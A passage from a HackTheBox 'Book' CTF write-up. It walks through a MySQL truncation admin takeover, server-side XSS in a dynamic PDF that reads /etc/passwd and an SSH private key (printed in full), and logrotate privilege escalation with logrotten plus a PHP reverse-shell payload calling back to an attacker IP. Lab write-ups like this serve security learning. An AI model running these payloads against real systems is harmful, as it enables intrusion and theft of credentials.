class="number">00</span>:<span class="number">36</span>] <span class="number">301</span> -  <span class="number">313B</span>  - /images  -&gt;  http:<span class="comment">//10.10.10.176/images/ </span></span><br><span class="line">[<span class="number">09</span>:<span class="number">00</span>:<span class="number">38</span>] <span class="number">200</span> -    <span class="number">7</span>KB - /index.php                                                                           </span><br><span class="line">[<span class="number">09</span>:<span class="number">00</span>:<span class="number">38</span>] <span class="number">200</span> -    <span class="number">7</span>KB - /index.php/login/</span><br><span class="line">[<span class="number">09</span>:<span class="number">00</span>:<span class="number">59</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /server-status                                                                </span><br><span class="line">[<span class="number">09</span>:<span class="number">00</span>:<span class="number">59</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /server-status/</span><br><span class="line">[<span class="number">09</span>:<span class="number">01</span>:<span class="number">00</span>] <span class="number">302</span> -    <span class="number">0B</span>  - /settings.php  -&gt;  index.php                                                            </span><br><span class="line">                                                                                           </span><br><span class="line"><span class="built_in">Task</span> Completed                                                                                                                                                                             </span><br><span class="line"></span><br><span class="line">root in htb/boxes/Book took <span class="number">1</span>m27s </span><br><span class="line">❯</span><br></pre></td></tr></table></figure>

<p>So there’s <code>admin</code> page here. I try to bypass it using basic sql injection but it’s not working :</p>
<p><img src="/img/book/book-admin-signin.png" alt="HackTheBox-Book" title="Book"></p>
<hr>
<h2 id="Post-Exploitation"><a href="#Post-Exploitation" class="headerlink" title="Post - Exploitation"></a>Post - Exploitation</h2><h3 id="Abusing-SQL-Truncate"><a href="#Abusing-SQL-Truncate" class="headerlink" title="Abusing SQL Truncate"></a>Abusing SQL Truncate</h3><p>remember the registration page that has set limit characters ? The MySQL truncation attack is based on the behaviour of the server when managing special characters like <code>spaces</code>.</p>
<p>In this case if the user send <code>admin@book.htb                     a</code> the database is going to check if emai are already use by another user. And if not, it is going to cut the username that has max to <code>20 characters</code> and save a new entry. Because of that I can easily change the admin password. The query is something like this :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: 10.10.10.176</span><br><span class="line">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: en-US,en;q=0.5</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Referer: http://10.10.10.176/index.php</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 64</span><br><span class="line">DNT: 1</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: PHPSESSID=eqqo5jp5sildltc2drfng6gn6c</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">name=medz&amp;email=admin                    a%40book.htb      a&amp;password=admin1234</span><br></pre></td></tr></table></figure>

<p>and the response was :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">HTTP/1.1 302 Found</span><br><span class="line">Date: Wed, 15 Apr 2020 21:54:48 GMT</span><br><span class="line">Server: Apache/2.4.29 (Ubuntu)</span><br><span class="line">Expires: Thu, 19 Nov 1981 08:52:00 GMT</span><br><span class="line">Cache-Control: no-store, no-cache, must-revalidate</span><br><span class="line">Pragma: no-cache</span><br><span class="line">location: index.php</span><br><span class="line">Content-Length: 0</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: text/html; charset=UTF-8</span><br></pre></td></tr></table></figure>

<p>We can now stop the burp suite tool. (Do not follow redirect, sometime it will not work)</p>
<p>Using the <code>create account</code> page, I manage to change the password of <code>admin</code> to password <code>admin1234</code> and now I can use <code>admin</code> account :</p>
<p><img src="/img/book/book-admin-home.png" alt="HackTheBox-Book" title="Book"></p>
<hr>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><h3 id="Local-File-Read-via-PDF"><a href="#Local-File-Read-via-PDF" class="headerlink" title="Local File Read via PDF"></a>Local File Read via PDF</h3><p>Now that I’m the admin the most interesting part is the <code>Collections</code> page where you can download <code>pdf</code> file which contains the name of a <code>users</code> or the <code>collections</code> name.</p>
<p>So, as a <code>PDF</code> is being dynamically created for every user, we can control the part of the input. Like performing <code>XSS Attack</code> to generated <code>pdf</code>.</p>
<p><img src="/img/book/book-upload-exploit.png" alt="HackTheBox-Book" title="Book"></p>
<p>the payload is look like this to get the valid <code>user</code></p>
<figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="comment">// javascript</span></span><br><span class="line"></span><br><span class="line">&lt;script&gt;x=<span class="keyword">new</span> XMLHttpRequest;x.onload=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;<span class="built_in">document</span>.write(<span class="keyword">this</span>.responseText)&#125;;x.open(<span class="string">"GET"</span>,<span class="string">"file:///etc/passwd"</span>);x.send();&lt;<span class="regexp">/script&gt;</span></span><br></pre></td></tr></table></figure>

<p>next is to download the generated <code>pdf</code>. The pdf contains <code>/etc/passwd</code> info, meaning I confirmed the <code>local file read</code> vulnerabilities</p>
<p><img src="/img/book/book-etc-passwd.png" alt="HackTheBox-Book" title="Book"></p>
<p>Now we get the valid user <code>reader</code></p>
<h3 id="Creating-javascript-payloads"><a href="#Creating-javascript-payloads" class="headerlink" title="Creating javascript payloads"></a>Creating javascript payloads</h3><p>From this <a href="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html" target="_blank" rel="noopener">article</a> we can perform <code>local file read</code> and try to get <code>SSH keys</code> the payload is look like this :</p>
<figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="comment">// javascript</span></span><br><span class="line"></span><br><span class="line">x=<span class="keyword">new</span> XMLHttpRequest;</span><br><span class="line">x.onload=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;<span class="built_in">document</span>.write(btoa(<span class="keyword">this</span>.responseText))&#125;;</span><br><span class="line">x.open(<span class="string">"GET"</span>,<span class="string">"file:///home/reader/.ssh/id_rsa"</span>);x.send();</span><br></pre></td></tr></table></figure>

<p>Now we will try reupload it again :</p>
<p><img src="/img/book/book-upload-exploit.png" alt="HackTheBox-Book" title="Book"></p>
<p>After that go back to <code>collections</code> and download the generated <code>pdf</code> file.</p>
<p>Opening the pdf it contains the <code>SSH keys</code> of the user</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">-----BEGIN RSA PRIVATE KEY-----</span><br><span class="line">MIIEpQIBAAKCAQEA2JJQsccK6fE05OWbVGOuKZdf0FyicoUrrm821nHygmLgWSpJ</span><br><span class="line">G8m6UNZyRGj77eeYGe/7YIQYPATNLSOpQIue3knhDiEsfR99rMg7FRnVCpiHPpJ0</span><br><span class="line">WxtCK0VlQUwxZ6953D16uxlRH8LXeI6BNAIjF0Z7zgkzRhTYJpKs6M80NdjUCl/0</span><br><span class="line">ePV8RKoYVWuVRb4nFG1Es0bOj29lu64yWd/j3xWXHgpaJciHKxeNlr8x6NgbPv4s</span><br><span class="line">7WaZQ4cjd+yzpOCJw9J91Vi33gv6+KCIzr+TEfzI82+hLW1UGx/13fh20cZXA6PK</span><br><span class="line">75I5d5Holg7ME40BU06Eq0E3EOY6whCPlzndVwIDAQABAoIBAQCs+kh7hihAbIi7</span><br><span class="line">3mxvPeKok6BSsvqJD7aw72FUbNSusbzRWwXjrP8ke/Pukg/OmDETXmtgToFwxsD+</span><br><span class="line">McKIrDvq/gVEnNiE47ckXxVZqDVR7jvvjVhkQGRcXWQfgHThhPWHJI+3iuQRwzUI</span><br><span class="line">tIGcAaz3dTODgDO04Qc33+U9WeowqpOaqg9rWn00vgzOIjDgeGnbzr9ERdiuX6WJ</span><br><span class="line">jhPHFI7usIxmgX8Q2/nx3LSUNeZ2vHK5PMxiyJSQLiCbTBI/DurhMelbFX50/owz</span><br><span class="line">7Qd2hMSr7qJVdfCQjkmE3x/L37YQEnQph6lcPzvVGOEGQzkuu4ljFkYz6sZ8GMx6</span><br><span class="line">GZYD7sW5AoGBAO89fhOZC8osdYwOAISAk1vjmW9ZSPLYsmTmk3A7jOwke0o8/4FL</span><br><span class="line">E2vk2W5a9R6N5bEb9yvSt378snyrZGWpaIOWJADu+9xpZScZZ9imHHZiPlSNbc8/</span><br><span class="line">ciqzwDZfSg5QLoe8CV/7sL2nKBRYBQVL6D8SBRPTIR+J/wHRtKt5PkxjAoGBAOe+</span><br><span class="line">SRM/Abh5xub6zThrkIRnFgcYEf5CmVJX9IgPnwgWPHGcwUjKEH5pwpei6Sv8et7l</span><br><span class="line">skGl3dh4M/2Tgl/gYPwUKI4ori5OMRWykGANbLAt+Diz9mA3FQIi26ickgD2fv+V</span><br><span class="line">o5GVjWTOlfEj74k8hC6GjzWHna0pSlBEiAEF6Xt9AoGAZCDjdIZYhdxHsj9l/g7m</span><br><span class="line">Hc5LOGww+NqzB0HtsUprN6YpJ7AR6+YlEcItMl/FOW2AFbkzoNbHT9GpTj5ZfacC</span><br><span class="line">hBhBp1ZeeShvWobqjKUxQmbp2W975wKR4MdsihUlpInwf4S2k8J+fVHJl4IjT80u</span><br><span class="line">Pb9n+p0hvtZ9sSA4so/DACsCgYEA1y1ERO6X9mZ8XTQ7IUwfIBFnzqZ27pOAMYkh</span><br><span class="line">sMRwcd3TudpHTgLxVa91076cqw8AN78nyPTuDHVwMN+qisOYyfcdwQHc2XoY8YCf</span><br><span class="line">tdBBP0Uv2dafya7bfuRG+USH/QTj3wVen2sxoox/hSxM2iyqv1iJ2LZXndVc/zLi</span><br><span class="line">5bBLnzECgYEAlLiYGzP92qdmlKLLWS7nPM0YzhbN9q0qC3ztk/+1v8pjj162pnlW</span><br><span class="line">y1K/LbqIV3C01ruxVBOV7ivUYrRkxR/u5QbS3WxOnK0FYjlS7UUAc4r0zMfWT9TN</span><br><span class="line">nkeaf9obYKsrORVuKKVNFzrWeXcVx+oG3NisSABIprhDfKUSbHzLIR4=</span><br><span class="line">-----END RSA PRIVATE KEY-----</span><br></pre></td></tr></table></figure>

<h3 id="Grab-the-user-flag"><a href="#Grab-the-user-flag" class="headerlink" title="Grab the user flag"></a>Grab the user flag</h3><p>Finally I can now login using <code>SSH</code> and the get the <code>user.txt</code> :</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">root in htb/boxes/Book via ⬢ v10<span class="number">.17</span><span class="number">.0</span> </span><br><span class="line">❯ ssh -v -i id_rsa reader@<span class="number">10.10</span><span class="number">.10</span><span class="number">.176</span></span><br><span class="line">OpenSSH_8<span class="number">.1</span>p1 Debian<span class="number">-1</span>, OpenSSL <span class="number">1.1</span><span class="number">.1</span>d  <span class="number">10</span> Sep <span class="number">2019</span></span><br><span class="line">debug1: Reading configuration data /etc/ssh/ssh_config</span><br><span class="line">debug1: /etc/ssh/ssh_config <span class="built_in">line</span> <span class="number">19</span>: Applying options <span class="keyword">for</span> *</span><br><span class="line">debug1: Connecting to <span class="number">10.10</span><span class="number">.10</span><span class="number">.176</span> [<span class="number">10.10</span><span class="number">.10</span><span class="number">.176</span>] port <span class="number">22.</span></span><br><span class="line">debug1: Connection established.</span><br><span class="line">debug1: identity file id_rsa type <span class="number">-1</span></span><br><span class="line">debug1: identity file id_rsa-cert type <span class="number">-1</span></span><br><span class="line">debug1: Local version <span class="built_in">string</span> SSH<span class="number">-2.0</span>-OpenSSH_8<span class="number">.1</span>p1 Debian<span class="number">-1</span></span><br><span class="line">debug1: Remote protocol version <span class="number">2.0</span>, remote software version OpenSSH_7<span class="number">.6</span>p1 Ubuntu<span class="number">-4u</span>buntu0<span class="number">.3</span></span><br><span class="line">debug1: match: OpenSSH_7<span class="number">.6</span>p1 Ubuntu<span class="number">-4u</span>buntu0<span class="number">.3</span> pat OpenSSH_7<span class="number">.0</span>*,OpenSSH_7<span class="number">.1</span>*,OpenSSH_7<span class="number">.2</span>*,OpenSSH_7<span class="number">.3</span>*,OpenSSH_7<span class="number">.4</span>*,OpenSSH_7<span class="number">.5</span>*,OpenSSH_7<span class="number">.6</span>*,OpenSSH_7<span class="number">.7</span>* compat <span class="number">0x04000002</span></span><br><span class="line">debug1: Authenticating to 10.10.10.176:22 as 'reader'</span><br><span class="line">debug1: SSH2_MSG_KEXINIT sent</span><br><span class="line">debug1: SSH2_MSG_KEXINIT received</span><br><span class="line">debug1: kex: algorithm: curve25519-sha256</span><br><span class="line">debug1: kex: host key algorithm: ecdsa-sha2-nistp256</span><br><span class="line">debug1: kex: server-&gt;client cipher: chacha20-poly1305@openssh.com MAC: &lt;implicit&gt; compression: none</span><br><span class="line">debug1: kex: client-&gt;server cipher: chacha20-poly1305@openssh.com MAC: &lt;implicit&gt; compression: none</span><br><span class="line">debug1: expecting SSH2_MSG_KEX_ECDH_REPLY</span><br><span class="line">debug1: <span class="built_in">Server</span> host key: ecdsa-sha2-nistp256 SHA256:QRw8pCXg7E8d9sWI+<span class="number">0</span>Z9nZxClJiq9/eAeT/<span class="number">9</span>wUfoQQk</span><br><span class="line">The authenticity of host '10.10.10.176 (10.10.10.176)' can't be established.</span><br><span class="line">ECDSA key fingerprint is SHA256:QRw8pCXg7E8d9sWI+<span class="number">0</span>Z9nZxClJiq9/eAeT/<span class="number">9</span>wUfoQQk.</span><br><span class="line">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes</span><br><span class="line">Warning: Permanently added '10.10.10.176' (ECDSA) to the list of known hosts.</span><br><span class="line">debug1: rekey out after <span class="number">134217728</span> blocks</span><br><span class="line">debug1: SSH2_MSG_NEWKEYS sent</span><br><span class="line">debug1: expecting SSH2_MSG_NEWKEYS</span><br><span class="line">debug1: SSH2_MSG_NEWKEYS received</span><br><span class="line">debug1: rekey in after <span class="number">134217728</span> blocks</span><br><span class="line">debug1: Will attempt key: id_rsa  <span class="keyword">explicit</span></span><br><span class="line">debug1: SSH2_MSG_EXT_INFO received</span><br><span class="line">debug1: kex_input_ext_info: server-sig-algs=&lt;ssh-ed25519,ssh-rsa,rsa-sha2<span class="number">-256</span>,rsa-sha2<span class="number">-512</span>,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521&gt;</span><br><span class="line">debug1: SSH2_MSG_SERVICE_ACCEPT received</span><br><span class="line">debug1: Authentications that can <span class="keyword">continue</span>: publickey,password</span><br><span class="line">debug1: Next authentication method: publickey</span><br><span class="line">debug1: Trying <span class="keyword">private</span> key: id_rsa</span><br><span class="line">debug1: Authentication succeeded (publickey).</span><br><span class="line">Authenticated to <span class="number">10.10</span><span class="number">.10</span><span class="number">.176</span> ([<span class="number">10.10</span><span class="number">.10</span><span class="number">.176</span>]:<span class="number">22</span>).</span><br><span class="line">debug1: channel <span class="number">0</span>: <span class="keyword">new</span> [client-session]</span><br><span class="line">debug1: Requesting no-more-sessions@openssh.com</span><br><span class="line">debug1: Entering interactive session.</span><br><span class="line">debug1: pledge: network</span><br><span class="line">debug1: client_input_global_request: rtype hostkeys<span class="number">-00</span>@openssh.com want_reply <span class="number">0</span></span><br><span class="line">debug1: Sending environment.</span><br><span class="line">debug1: Sending env LANG = en_US.utf8</span><br><span class="line">Welcome to Ubuntu <span class="number">18.04</span><span class="number">.2</span> LTS (GNU/Linux <span class="number">5.4</span><span class="number">.1</span><span class="number">-050401</span>-generic x86_64)</span><br><span class="line"></span><br><span class="line"> * Documentation:  https:<span class="comment">//help.ubuntu.com</span></span><br><span class="line"> * Management:     https:<span class="comment">//landscape.canonical.com</span></span><br><span class="line"> * Support:        https:<span class="comment">//ubuntu.com/advantage</span></span><br><span class="line"></span><br><span class="line">  System information as of Wed Apr <span class="number">15</span> <span class="number">22</span>:<span class="number">46</span>:<span class="number">04</span> UTC <span class="number">2020</span></span><br><span class="line"></span><br><span class="line">  System load:  <span class="number">0.0</span>                Processes:            <span class="number">159</span></span><br><span class="line">  Usage of /:   <span class="number">28.3</span>% of <span class="number">19.56</span>GB   Users logged in:      <span class="number">2</span></span><br><span class="line">  Memory usage: <span class="number">40</span>%                IP address <span class="keyword">for</span> ens33: <span class="number">10.10</span><span class="number">.10</span><span class="number">.176</span></span><br><span class="line">  Swap usage:   <span class="number">0</span>%</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> * Canonical Livepatch is <span class="built_in">available</span> <span class="keyword">for</span> installation.</span><br><span class="line">   - Reduce system reboots <span class="keyword">and</span> improve kernel security. Activate at:</span><br><span class="line">     https:<span class="comment">//ubuntu.com/livepatch</span></span><br><span class="line"></span><br><span class="line"><span class="number">114</span> packages can be updated.</span><br><span class="line"><span class="number">0</span> updates are security updates.</span><br><span class="line"></span><br><span class="line">Failed to <span class="built_in">connect</span> to https:<span class="comment">//changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Last login: Wed Apr <span class="number">15</span> <span class="number">20</span>:<span class="number">30</span>:<span class="number">55</span> <span class="number">2020</span> from <span class="number">10.10</span><span class="number">.14</span><span class="number">.220</span></span><br><span class="line">reader@book:~$ </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">reader@book:~$ whoami</span><br><span class="line">reader</span><br><span class="line">reader@book:~$ hostname</span><br><span class="line">book</span><br><span class="line">reader@book:~$ ls</span><br><span class="line">backups  backups1  logrotten  lse.sh  psp  user.txt</span><br><span class="line">reader@book:~$ cut -c <span class="number">4</span><span class="number">-12</span> user.txt</span><br><span class="line">d4b5197fa</span><br><span class="line">reader@book:~$</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h2><h3 id="Getting-Root-Access"><a href="#Getting-Root-Access" class="headerlink" title="Getting Root Access"></a>Getting Root Access</h3><p>In our user <code>reader</code> there is a backups folder in the home directory :</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// bash</span></span><br><span class="line"></span><br><span class="line">reader@book:~$ ls</span><br><span class="line">backups  logrotten  lse.sh  psp  user.txt</span><br><span class="line">reader@book:~$</span><br></pre></td></tr></table></figure>

<p>then I check what’s inside on the backup folder :</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// bash</span></span><br><span class="line"></span><br><span class="line">reader@book:~$ ls -la backups/</span><br><span class="line">total <span class="number">12</span></span><br><span class="line">drwxr-xr-x <span class="number">2</span> reader reader <span class="number">4096</span> Apr <span class="number">15</span> <span class="number">21</span>:<span class="number">38</span> .</span><br><span class="line">drwxr-xr-x <span class="number">9</span> reader reader <span class="number">4096</span> Apr <span class="number">15</span> <span class="number">21</span>:<span class="number">38</span> ..</span><br><span class="line">-rw-r--r-- <span class="number">1</span> reader reader    <span class="number">0</span> Apr <span class="number">15</span> <span class="number">21</span>:<span class="number">38</span> access.<span class="built_in">log</span></span><br><span class="line">-rw-r--r-- <span class="number">1</span> reader reader   <span class="number">91</span> Apr <span class="number">15</span> <span class="number">21</span>:<span class="number">38</span> access.<span class="built_in">log</span><span class="number">.1</span></span><br><span class="line">lrwxrwxrwx <span class="number">1</span> reader reader   <span class="number">22</span> Apr <span class="number">15</span> <span class="number">18</span>:<span class="number">48</span> bash_completion.d -&gt; /etc/bash_completion.d</span><br><span class="line">reader@book:~/backups$ cat access.<span class="built_in">log</span><span class="number">.1</span> </span><br><span class="line"><span class="number">192.168</span><span class="number">.0</span><span class="number">.104</span> - - [<span class="number">29</span>/Jun/<span class="number">2019</span>:<span class="number">14</span>:<span class="number">39</span>:<span class="number">55</span> +<span class="number">0000</span>] <span class="string">"GET /robbie03 HTTP/1.1"</span> <span class="number">404</span> <span class="number">446</span> <span class="string">"-"</span> <span class="string">"curl"</span></span><br></pre></td></tr></table></figure>

<p>so there’s a log file which can be a logs by another user. To monitor the services running on the target machine I use <code>pspy</code> :</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// bash</span></span><br><span class="line"></span><br><span class="line"><span class="number">2020</span>/<span class="number">04</span>/<span class="number">14</span> <span class="number">10</span>:<span class="number">17</span>:<span class="number">39</span> CMD: UID=<span class="number">0</span>    PID=<span class="number">78202</span>  | sleep <span class="number">5</span> </span><br><span class="line"><span class="number">2020</span>/<span class="number">04</span>/<span class="number">14</span> <span class="number">10</span>:<span class="number">17</span>:<span class="number">44</span> CMD: UID=<span class="number">0</span>    PID=<span class="number">78205</span>  | /usr/sbin/logrotate -f /root/<span class="built_in">log</span>.cfg </span><br><span class="line"><span class="number">2020</span>/<span class="number">04</span>/<span class="number">14</span> <span class="number">10</span>:<span class="number">17</span>:<span class="number">44</span> CMD: UID=<span class="number">0</span>    PID=<span class="number">78204</span>  | /bin/sh /root/<span class="built_in">log</span>.sh </span><br><span class="line"><span class="number">2020</span>/<span class="number">04</span>/<span class="number">14</span> <span class="number">10</span>:<span class="number">17</span>:<span class="number">44</span> CMD: UID=<span class="number">0</span>    PID=<span class="number">78206</span>  | sleep <span class="number">5</span></span><br></pre></td></tr></table></figure>

<p>If logrotate is running as root, and ordinary users have write access to the log files polled by logrotate, then there is a vulnerability exploit that can increase rights.</p>
<p>I’ve first verify that access.log is a polled file and write 10M random bitstream data to it :</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// bash</span></span><br><span class="line"></span><br><span class="line">reader@book:~/backups$ head -c <span class="number">10</span>M &lt; /dev/urandom &gt; access.<span class="built_in">log</span></span><br><span class="line">reader@book:~/backups$ ls -la</span><br><span class="line">total <span class="number">10252</span></span><br><span class="line">drwxr-xr-x <span class="number">2</span> reader reader     <span class="number">4096</span> Jan <span class="number">29</span> <span class="number">13</span>:<span class="number">05</span> .</span><br><span class="line">drwxr-xr-x <span class="number">7</span> reader reader     <span class="number">4096</span> Jan <span class="number">29</span> <span class="number">13</span>:<span class="number">05</span> ..</span><br><span class="line">-rw-r--r-- <span class="number">1</span> reader reader <span class="number">10485760</span> Apr <span class="number">15</span> <span class="number">02</span>:<span class="number">35</span> access.<span class="built_in">log</span></span><br><span class="line">-rw-r--r-- <span class="number">1</span> reader reader       <span class="number">91</span> Jan <span class="number">29</span> <span class="number">13</span>:<span class="number">05</span> access.<span class="built_in">log</span><span class="number">.1</span></span><br><span class="line">reader@book:~/backups$ ls -la</span><br><span class="line">total <span class="number">10252</span></span><br><span class="line">drwxr-xr-x <span class="number">2</span> reader reader     <span class="number">4096</span> Apr <span class="number">15</span> <span class="number">02</span>:<span class="number">35</span> .</span><br><span class="line">drwxr-xr-x <span class="number">7</span> reader reader     <span class="number">4096</span> Jan <span class="number">29</span> <span class="number">13</span>:<span class="number">05</span> ..</span><br><span class="line">-rw-r--r-- <span class="number">1</span> reader reader        <span class="number">0</span> Apr <span class="number">15</span> <span class="number">02</span>:<span class="number">35</span> access.<span class="built_in">log</span></span><br><span class="line">-rw-r--r-- <span class="number">1</span> reader reader <span class="number">10485760</span> Apr <span class="number">15</span> <span class="number">02</span>:<span class="number">35</span> access.<span class="built_in">log</span><span class="number">.1</span></span><br><span class="line">-rw-r--r-- <span class="number">1</span> reader reader       <span class="number">91</span> Jan <span class="number">29</span> <span class="number">13</span>:<span class="number">05</span> access.<span class="built_in">log</span><span class="number">.2</span></span><br></pre></td></tr></table></figure>

<p>Confirmed ! It’s written another <code>access.log.2</code> log file .</p>
<h3 id="Logrotten"><a href="#Logrotten" class="headerlink" title="Logrotten"></a>Logrotten</h3><p>I downloaded the logrotate exploit from <a href="https://github.com/whotwagner/logrotten" target="_blank" rel="noopener">github</a> to my machine, compile then transfer to book machine :</p>
<h3 id="Compile-logrotten"><a href="#Compile-logrotten" class="headerlink" title="Compile logrotten"></a>Compile logrotten</h3><figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// bash</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">root in htb/boxes/Book via ⬢ v10<span class="number">.17</span><span class="number">.0</span> </span><br><span class="line">❯ gcc -o logrotten logrotten.c</span><br></pre></td></tr></table></figure>

<h3 id="Payload-for-Reverse-Shell"><a href="#Payload-for-Reverse-Shell" class="headerlink" title="Payload for Reverse Shell"></a>Payload for Reverse Shell</h3><p>then I create another payload for revershell shell :</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// bash</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">root in htb/boxes/Book via ⬢ v10<span class="number">.17</span><span class="number">.0</span> took <span class="number">5</span>m35s </span><br><span class="line">❯ cat payloadfile</span><br><span class="line">php -r '$sock=fsockopen("10.10.14.121",4444);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</span><br><span class="line"></span><br><span class="line">root in htb/boxes/Book via ⬢ v10<span class="number">.17</span><span class="number">.0</span> </span><br><span class="line">❯</span><br></pre></td></tr></table></figure>

<p>Transfer it to target machine using <code>wget</code> and execute it :</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// bash</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">reader@book:/tmp$ ./logrotten -p ./payloadfile /<span class="built_in">home</span>/reader/backups/access.<span class="built_in">log</span> -d</span><br><span class="line">logfile: /<span class="built_in">home</span>/reader/backups/access.<span class="built_in">log</span></span><br><span class="line">logpath: /<span class="built_in">home</span>/reader/backups</span><br><span class="line">logpath2: /<span class="built_in">home</span>/reader/backups2</span><br><span class="line">targetpath: /etc/bash_completion.d/access.<span class="built_in">log</span></span><br><span class="line">targetdir: /etc/bash_completion.d</span><br><span class="line">p: access.<span class="built_in">log</span></span><br><span class="line">Waiting <span class="keyword">for</span> rotating /<span class="built_in">home</span>/reader/backups/access.<span class="built_in">log</span>...</span><br><span class="line">Renamed /<span class="built_in">home</span>/reader/backups with /<span class="built_in">home</span>/reader/backups2 <span class="keyword">and</span> created symlink to /etc/bash_completion.d</span><br><span class="line">Waiting <span class="number">1</span> seconds before writing payload...</span><br><span class="line">Done!</span><br><span class="line">reader@book:/tmp$</span><br></pre></td></tr></table></figure>

<p>Next i check the <code>/etc/bash_completion.d</code> and my payload is written there :</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// bash</span></span><br><span class="line"></span><br><span class="line">reader@book:/etc/bash_completion.d$ ls</span><br><span class="line">access.<span class="built_in">log</span>  access.<span class="built_in">log</span><span class="number">-2020041722.b</span>ackup  apport_completion  cloud-init  git-prompt  grub</span><br><span class="line"></span><br><span class="line">reader@book:/tmp$ cat /etc/bash_completion.d/access.<span class="built_in">log</span></span><br><span class="line">php -r '$sock=fsockopen("10.10.14.121",4444);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</span><br><span class="line">reader@book:/tmp$</span><br></pre></td></tr></table></figure>

<p>I executed again the exploit and payload and at the same time I setup a <code>ncat</code> listener from my machine. Finally got the root access but’s it will hangup immediately :</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// bash</span></span><br><span class="line"></span><br><span class="line">root in htb/boxes/Book via ⬢ v10<span class="number">.17</span><span class="number">.0</span> </span><br><span class="line">❯ nc -lvnp <span class="number">4444</span></span><br><span class="line">listening on [any] <span class="number">4444</span> ...</span><br><span class="line"><span class="built_in">connect</span> to [<span class="number">10.10</span><span class="number">.14</span><span class="number">.121</span>] from (UNKNOWN) [<span class="number">10.10</span><span class="number">.10</span><span class="number">.176</span>] <span class="number">42610</span></span><br><span class="line"><span class="meta"># id</span></span><br><span class="line">uid=<span class="number">0</span>(root) gid=<span class="number">0</span>(root) groups=<span class="number">0</span>(root)</span><br><span class="line"># ls</span><br><span class="line">clean_backup.sh</span><br><span class="line">clean.sh</span><br><span class="line">cron_root</span><br><span class="line"><span class="built_in">log</span>.cfg</span><br><span class="line"><span class="built_in">log</span>.sh</span><br><span class="line">reset.sh</span><br><span class="line">root.txt</span><br><span class="line"># cat root.txt</span><br><span class="line">Hangup</span><br></pre></td></tr></table></figure>

<p>Executed it again and get the <code>root flag</code></p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// bash</span></span><br><span class="line"></span><br><span class="line">root in htb/boxes/Book via ⬢ v10<span class="number">.17</span><span class="number">.0</span> took <span class="number">1</span>m17s </span><br><span class="line">❯ nc -lvnp <span class="number">4444</span></span><br><span class="line">listening on [any] <span class="number">4444</span> ...</span><br><span class="line"><span class="built_in">connect</span> to [<span class="number">10.10</span><span class="number">.14</span><span class="number">.121</span>] from (UNKNOWN) [<span class="number">10.10</span><span class="number">.10</span><span class="number">.176</span>] <span class="number">42626</span></span><br><span class="line"><span class="meta"># cut -c 4-12 root.txt</span></span><br><span class="line"><span class="number">92</span>adf998</span><br><span class="line"># Hangup</span><br><span class="line"></span><br><span class="line">root in htb/boxes/Book via ⬢ v10<span class="number">.17</span><span class="number">.0</span> took <span class="number">55</span>s </span><br><span class="line">❯</span><br></pre></td></tr></table></figure>

<hr>
<p>If you liked my writeup please leave a respect on my <a href="https://www.hackthebox.eu/profile/128965" target="_blank" rel="noopener">Profile</a></p>
<p><img src="https://www.hackthebox.eu/badge/image/128965" alt="Payas0" title="Payas0"></p>
<hr>
<p>Referrences:</p>
<p><a href="https://github.com/whotwagner/logrotten" target="_blank" rel="noopener">Logrotten Exploit</a></p>
<p><a href="https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf" target="_blank" rel="noopener">Server Side XSS - Dynamic PDF</a></p>
